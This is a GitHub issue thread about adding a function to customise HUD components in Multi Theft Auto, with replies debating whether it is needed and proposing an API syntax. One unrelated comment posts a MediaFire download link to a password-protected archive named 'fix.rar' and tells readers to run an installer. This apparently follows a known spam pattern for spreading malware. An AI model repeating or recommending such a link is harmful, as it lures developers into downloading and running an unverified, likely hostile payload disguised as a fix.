### ISSUE TITLE
Support HUD Components Customizations

### ISSUE THREAD

**Issue by Proxy-99** [multitheftauto/mtasa-blue#3682]
### Is your feature request related to a problem? Please describe.

Support HUD Components Customizations
color 
x pos
y pos
length 
width

### Describe the solution you'd like

adding new function setHudComponent(string Component, x pos, y pos, height,width, color)

### Additional context
part of #3582

memory address
check https://gtag.sannybuilder.com/forums/index.php?showtopic=265

### Security Policy

- [X] I have read and understood the Security Policy and this issue is not about a cheat or security vulnerability.

**Comment by mayank785** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by CrosRoad95** [comment]
Make your own hud, yes, mark my post as offtopic, waste time on implementing something that i can implement in lua. Just don't remember to tell everyone you didn't find time for 5 years to do work on pr that adds actual value to mta

**Comment by tederis** [comment]
I would suggest the following syntax: `setHudComponentAttribute(componentName, attributeName, values...)`, `getHudComponentAttribute(componentName, attributeName)` and `resetHudComponents()`.
